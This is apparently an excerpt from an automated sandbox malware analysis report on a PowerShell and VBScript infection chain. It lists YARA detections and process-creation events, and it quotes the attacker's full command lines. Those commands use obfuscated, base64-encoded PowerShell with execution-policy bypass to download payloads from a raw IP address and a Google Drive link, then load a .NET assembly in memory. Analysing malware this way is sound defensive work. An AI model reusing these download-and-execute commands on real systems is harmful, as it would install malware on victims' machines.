            Source: powershell.exe, 00000001.00000002.2233257801.0000000007342000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
            Source: powershell.exe, 00000009.00000002.2200805471.0000000002C6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
            Source: powershell.exe, 00000001.00000002.2233257801.0000000007359000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8
            Source: wscript.exe, 00000006.00000003.2162764708.0000000004DE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KZmcCKOAvmcizPN
            Source: powershell.exe, 00000003.00000002.2098893857.00000000051B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: seemethebestthingswithgreatneedswithgoodformewith[1].tiff.1.drBinary or memory string: WchcAzdtonfikUG = "KZmcCKOAvmcizPN"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell decode and execute
            Source: Yara matchFile source: amsi32_6512.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi32_6004.amsi.csv, type: OTHER
            Yara detected Powershell download and execute
            Source: Yara matchFile source: amsi32_6004.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6004, type: MEMORYSTR
            Bypasses PowerShell execution policy
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenTJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2C04.tmp" "c:\Users\user\AppData\Local\Temp\ly0yjdqb\CSC746F8121F2314519843BE09F69B09E4D.TMP"Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfzenmi1tutgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfezc10evbficagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfrmlosxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtw9ulkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagigthrenpeuffdkgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagd3esc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagzkhusk9pqwdhtcx1aw50icagicagicagicagicagicagicagicagicagicagicagzmnmv0juwcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbis2cpoycgicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagicj3tnztcexmrlp2iiagicagicagicagicagicagicagicagicagicagicagic1oyu1lu1bbq0ugicagicagicagicagicagicagicagicagicagicagicb0cu9kwvbrucagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakvkq2yjvns0y6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotgundyumtc4lje1ms82ni9zzwvtzxrozwjlc3r0agluz3n3axroz3jlyxruzwvkc3dpdghnb29kzm9ybwv3axrolnrjriisiirftny6qvbqrefuqvxzzwvtzxrozwjlc3r0agluz3n3axroz3jlyxruzwvkc3dpdghnby52ynmildasmck7c3rbcnqtu2xfzxaomyk7c1rbulqgicagicagicagicagicagicagicagicagicagicagicaijgvodjpbufbeqvrbxhnlzw1ldghlymvzdhroaw5nc3dpdghncmvhdg5lzwrzd2l0agdvlnzicyi='+[char]34+'))')))"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrtsevmbglkwzfdkyrzaevsbelkwzezxssnwccpicgoj2p2twltywdlvxjsid0gduniahr0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlvoqll3dxigdunio2p2txdlyknsawvudca9ie5ldy1pymplyycrj3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7anznaw1hz2vcjysnexrljysncya9igp2txdlyknsawvudc5eb3dubg9hzerhjysndgeoanznaw1hz2vvcmwpo2p2twltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkgp2twltywdlqnl0zxmpo2p2txn0yxj0rmxhzya9ihvdyjw8qkftrty0x1nuqvjupj51q2i7anznzw5kjysnrmxhzya9ihvdyjw8qkftrty0x0vord4+dunio2p2txn0yxj0sw5kzxggpsbqdk1pbwfnzvrlehqusw5kzxhpzihqdk1zdgfydezsywcpo2p2twvuzeluzgv4id0ganznaw1hz2vuzxh0jysnlkluzgv4t2ynkycoanznzw5krmxhzyk7anznc3rhcnrjbmrlecatz2ugmcatyw5kigp2twvuzeluzgv4ic1ndcbqdk1zdgfydeluzgv4o2p2txn0yxj0sw5kzxggkz0ganznc3rhcnrgbgfnlkxlbmd0adtqdk1iyxnlnjrmzw5ndgggpsbqdk1lbmrjjysnbmrlecatigp2txn0yxj0sw5kzscrj3g7anznymfzzty0q29tbwfuzca9igp2twltywdlvgv4dc5tdwjzdhjpbmcoanznc3rhcnrjbmrlecwganznymfzzty0tgvuz3rokttqdk0nkydiyxnlnjrszxzlcnnlzca9ic1qb2luichqdk1iyxnlnjrdb21tyw5kllrvq2hhckfycmf5kccrjykgbnjfiezvckvhjysny2gtt2jqzwn0ihsganznxyb9kvstms4ulshqdk1iyxnlnjrdb21tyw5klkxlbmd0acldo2p2twnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoanznymfzzty0umv2zxjzzwqpo2p2twxvywrlzefzc2vtymx5iccrjz0gw1n5jysnc3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchqdk1jb21tyw5kqnl0zxmpo2p2txzhau1ldghvzca9iftkbmxpyi5jty5ib21lxscrjy5hzxrnzxrob2qnkycodunivkfjdunikttqdk12ywlnzxrob2qusw52b2tlkgp2tw51bgwsieaodunidhh0licrj0dst0wnkydmlzy2lze1ms44nzeunjquodkxlycrjy86chr0ahvdjysnyiwgdunizgvzyxrpdmfkb3vdyiwgdunizgvzyscrj3rpdmfkb3vdyiwgdunizgvzyxrpdmfkb3vdyicrjywgduniyxnwbicrj2unkyd0x3jlz2jyb3dzzxjzdunilcb1q2jkzxnhdgl2ywrvdunilcb1q2jkzxnhdgl2ywrvdunilhvdymrlc2f0axzhzg91q2isdunizgvzyxrpdmfkb3vdyix1q2jkzxnhdgl2ywrvdunilhvdymrlc2f0axzhzg91q2isdunizgvzyscrj3rpdmfkb3vdyix1q2ixdunilhvdymrlc2f0axzhzg91q2ipktsnks5szxbsqwnlkcdqdk0nlcckjykuumvwbefjzsgndunijyxbc1ryaw5hxvtjagfsxtm5ks5szxbsqwnlkchby2hhul0xmtarw2noyvjdmte0k1tjagfsxty5ksxbc1ryaw5hxvtjagfsxteynckp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $shellid[1]+$shellid[13]+'x') (('jvmimageurl = ucbhttps://drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur ucb;jvmwebclient = new-objec'+'t system.net.webclient;jvmimageb'+'yte'+'s = jvmwebclient.downloadda'+'ta(jvmimageurl);jvmimagetext = [system.text.encoding]::utf8.getstring(jvmimagebytes);jvmstartflag = ucb<<base64_start>>ucb;jvmend'+'flag = ucb<<base64_end>>ucb;jvmstartindex = jvmimagetext.indexof(jvmstartflag);jvmendindex = jvmimagetext'+'.indexof'+'(jvmendflag);jvmstartindex -ge 0 -and jvmendindex -gt jvmstartindex;jvmstartindex += jvmstartflag.length;jvmbase64length = jvmendi'+'ndex - jvmstartinde'+'x;jvmbase64command = jvmimagetext.substring(jvmstartindex, jvmbase64length);jvm'+'base64reversed = -join (jvmbase64command.tochararray('+') nre forea'+'ch-object { jvm_ })[-1..-(jvmbase64command.length)];jvmcommandbytes = [system.convert]::frombase64string(jvmbase64reversed);jvmloadedassembly '+'= [sy'+'stem.reflection.assembly]::load(jvmcommandbytes);jvmvaimethod = [dnlib.io.home]'+'.getmethod'+'(ucbvaiucb);jvmvaimethod.invoke(jvmnull, @(ucbtxt.'+'grol'+'l/66/151.871.64.891/'+'/:ptthuc'+'b, ucbdesativadoucb, ucbdesa'+'tivadoucb, ucbdesativadoucb'+', ucbaspn'+'e'+'t_regbrowsersucb, ucbdesativadoucb, ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesa'+'tivadoucb,ucb1ucb,ucbdesativadoucb));').replace('jvm','$').replace('ucb',[string][char]39).replace(([char]110+[char]114+[char]69),[string][char]124))"
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfzenmi1tutgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfezc10evbficagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfrmlosxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtw9ulkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagigthrenpeuffdkgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagd3esc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagzkhusk9pqwdhtcx1aw50icagicagicagicagicagicagicagicagicagicagicagzmnmv0juwcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbis2cpoycgicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagicj3tnztcexmrlp2iiagicagicagicagicagicagicagicagicagicagicagic1oyu1lu1bbq0ugicagicagicagicagicagicagicagicagicagicagicb0cu9kwvbrucagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakvkq2yjvns0y6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotgundyumtc4lje1ms82ni9zzwvtzxrozwjlc3r0agluz3n3axroz3jlyxruzwvkc3dpdghnb29kzm9ybwv3axrolnrjriisiirftny6qvbqrefuqvxzzwvtzxrozwjlc3r0agluz3n3axroz3jlyxruzwvkc3dpdghnby52ynmildasmck7c3rbcnqtu2xfzxaomyk7c1rbulqgicagicagicagicagicagicagicagicagicagicagicaijgvodjpbufbeqvrbxhnlzw1ldghlymvzdhroaw5nc3dpdghncmvhdg5lzwrzd2l0agdvlnzicyi='+[char]34+'))')))"Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrtsevmbglkwzfdkyrzaevsbelkwzezxssnwccpicgoj2p2twltywdlvxjsid0gduniahr0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlvoqll3dxigdunio2p2txdlyknsawvudca9ie5ldy1pymplyycrj3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7anznaw1hz2vcjysnexrljysncya9igp2txdlyknsawvudc5eb3dubg9hzerhjysndgeoanznaw1hz2vvcmwpo2p2twltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkgp2twltywdlqnl0zxmpo2p2txn0yxj0rmxhzya9ihvdyjw8qkftrty0x1nuqvjupj51q2i7anznzw5kjysnrmxhzya9ihvdyjw8qkftrty0x0vord4+dunio2p2txn0yxj0sw5kzxggpsbqdk1pbwfnzvrlehqusw5kzxhpzihqdk1zdgfydezsywcpo2p2twvuzeluzgv4id0ganznaw1hz2vuzxh0jysnlkluzgv4t2ynkycoanznzw5krmxhzyk7anznc3rhcnrjbmrlecatz2ugmcatyw5kigp2twvuzeluzgv4ic1ndcbqdk1zdgfydeluzgv4o2p2txn0yxj0sw5kzxggkz0ganznc3rhcnrgbgfnlkxlbmd0adtqdk1iyxnlnjrmzw5ndgggpsbqdk1lbmrjjysnbmrlecatigp2txn0yxj0sw5kzscrj3g7anznymfzzty0q29tbwfuzca9igp2twltywdlvgv4dc5tdwjzdhjpbmcoanznc3rhcnrjbmrlecwganznymfzzty0tgvuz3rokttqdk0nkydiyxnlnjrszxzlcnnlzca9ic1qb2luichqdk1iyxnlnjrdb21tyw5kllrvq2hhckfycmf5kccrjykgbnjfiezvckvhjysny2gtt2jqzwn0ihsganznxyb9kvstms4ulshqdk1iyxnlnjrdb21tyw5klkxlbmd0acldo2p2twnvbw1hbmrcexrlcya9ifttexn0zw0uq29u